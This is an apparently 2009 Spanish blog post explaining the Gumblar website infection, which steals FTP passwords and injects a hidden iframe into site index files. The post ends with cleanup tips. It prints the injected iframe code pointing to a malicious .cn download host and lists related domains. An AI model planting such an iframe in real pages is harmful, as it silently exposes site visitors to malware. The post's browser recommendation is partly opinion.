Hace un tiempo largo ya que mi navegador predeterminado (Google Chrome) me muestra una pantalla roja con un cartel de advertencia en blanco en algunos sitios como el que muestro en la siguiente imagen:
Como hay muchos sitios que suelen meter "códigos maliciosos", no le dí importancia...
Hasta que hace unos días, ayudando a gente amiga a actualizar su foro, nos encontramos con el mismo cartel. Obviamente esta gente no había puesto ningún código malicioso en su sitio, ni siquiera lo había modificado...
La cuestión es que cuando uno ingresa, automáticamente salta el alerta de virus (al menos en Eset Smart Security Business Edition) como pueden ver en la imagen a continuación:
Uno es el JS/TrojanDownloader.Iframe.NER trojan. Un troyano en Java Script.
Y el otro es el SWF/TrojanDownloader.Swif.C trojan. Un Troyano que entra por Flash.
El tema es que el virus va mutando, cambiando los sitios (los dominios) y las formas de ataque buscando vulnerabilidades en Flash, PDF, Java, incluso en bugs del propio navegador.
¿Cómo reconocer un sitio infectado con el virus?
Darse cuenta si un sitio está infectado es muy simple, al ingresar (si nuestro antivirus no detecta nada) veremos que en la parte superior y/o inferior de la página, hay un espacio sin nada del tamaño de un banner grande o un encabezado de un website. Como si se hubiera dejado un espacio y luego comienza la página propiamente dicha.
Esto ocurre porque el virus inserta un Iframe (algo así como una capa o una tabla, pero que es totalmente ajeno al sitio). Esto lo hace modificando los archivos "Index" (archivo de entrada) del sitio. Si miramos el código fuente de la página, veremos que al comienzo o al final de la misma, hay un código similar a este:
Cita :<iframe src="http://globalnameshop.cn:8080/index.php" width=115 height=193 style="visibility: hidden"></iframe>
En este código va variando el dominio, como ejemplo colocamos globalnameshop.cn, pero varía casi con cada visita al sitio, algunos otros ejemplos son: namemartfilmlife.cn, catchynamestore.cn, bigtopbrands.cn, etc. Al menos todas las variantes que vi yo, son .cn, es decír, dominios de origen chino.
¿Cómo es posible que se pueda modificar el index de un sitio?
Bueno, al principio no comprendía como era que actuaba el virus, no parecía tener lógica (mientras pensaba que era una infección por parte de bots en el servidor) hasta que me puse a fijar en el ftp (ya que había infectado otros sitios) y ahí la cosa cambió.
El virus al infectar una Pc, toma los usuarios y contraseñas de todas las cuentas FTP almacenadas en ella para ampliar la infección en nuevos sitios web descargando los archivos index, modificandolos agregándoles el iframe, y luego volviendo a subirlos por FTP (también agrega archivos infectados en otras partes del sitio, archivos con nombres como image.php, etc).
Hoy realicé una nueva búsqueda y di con este artículo de un virus llamado "Gumblar" que no sé si es el mismo o una variante, pero tiene un comportamiento básicamente similar. Léanlo.
Cita :22/05/2009 "Gumblar" en los medios
Gumblar es un espécimen de origen chino que llevaba cierto tiempo circulando, se detectó y comenzó a seguir desde finales de marzo. Los medios se han fijado en él (siempre recordando que la noticia origen es de una casa antivirus) por el preocupante y rápido aumento de infectados que se ha contabilizado en las últimas semanas. Ha llegando a doblar el número de victimas semanalmente; también se le atribuye el 42 por ciento de las nuevas infecciones detectadas en sitios web.
El comportamiento del ejemplar es interesante. Gumblar se nutre de dos vías diferentes, la principal es infectando un sitio web a través de contraseñas FTP capturadas o explotando vulnerabilidades de servidor conocidas. Una vez consigue acceder al servidor web, inyecta código javascript en las páginas alojadas pero intenta evadir aquellas que son más susceptibles de ser examinadas ocasionalmente por un administrador, como la página principal o un index.html. Adicionalmente, cada vez que el script se inserta, es ofuscado de diferente forma para eludir la identificación mediante firma de los motores de los antivirus.
La segunda vía toma forma cuando el sitio web infectado es visitado. El script es ejecutado por el cliente e intenta explotar en el un abanico de exploits que van desde vulnerabilidades multiplataforma en el reproductor Flash o el lector de archivos PDF Adobe Reader hasta específicas de Internet Explorer. Si consigue su objetivo (entre otras acciones ya comunes entre el malware) instalará un troyano en la máquina del visitante que se dedicará a inspeccionar el tráfico con, a su vez, dos funciones a destacar: examinar el tráfico en busca de contraseñas de servidores FTP para usarlas en nuevas infecciones y la inyección de tráfico cuando el usuario efectúa una búsqueda en Google, mostrándole resultados manipulados que apuntan a sitios fraudulentos. Ser el "Google" particular (e insospechado) de un buen número de "clientes" puede resultar muy lucrativo.
En las últimas infecciones se ha detectado, como no podía ser de otra forma, la instalación de un componente para asociar al nodo infectado a una botnet.
Los dominios principales de los que se sirve el malware son entre otros "gumblar.cn" y "martuz.cn" y han sido bloqueados. Pero el malware descarga otros componentes desde otras localizaciones que todavía siguen activas. Estos binarios tienen un nivel de detección de poco más del 50% de los motores según el análisis en VirusTotal.com.
El comportamiento combinado de Gumblar no deja de ser interesante aunque todavía no se conozca la incidencia a largo plazo del espécimen.
Fuente:
Como habrán leído es un virus nuevo, de hace 2 meses y que es el responsable de casi el 50% de las infecciones en sitios webs a nivel global.
Recomendaciones para Webmasters Si son Infectados
> Desinfectar la pc con varios antivirus (entre ellos algunos Online)
> Utilizar un FTP "Portable" (ya que No almacena en sistema las claves)
> Cambiar Usuario y Password de todas las cuentas FTP.
> Reemplazar Todos los archivos del site infectado por un Backup Limpio.
Recomendaciones para Usuarios
> Mantener Actualizado el antivirus que usen.
> Utilizar Google Chrome como navegador predeterminado*.
> Realizar un scanneo Online periódicamente.
*¿Por qué utilizar Google Chrome?
Mas allá de que Google Chrome haya sido el único navegador que sobrevivió a todos los ataques de hacking durante los 3 días en el último torneo anual de "Pwn2Own" (donde safari fué hackeado en 7 segundos, y Firefox y Explorer 8 en el primer día) el motivo fundamental es muy simple...
¿De quién son los robots que revisan todos los sitios webs a diario?... De Google, obviamente.. ¿Y a quién le avisará que un sitio tiene virus? a Google Chrome, muy bien, por eso cada vez que haya un sitio infectado, Google Chrome te mostrará una pantalla roja de advertencia con el cartel mostrado al principio y ninguno mas que Google, sabe que site está infectado.
Yo, Publicado en: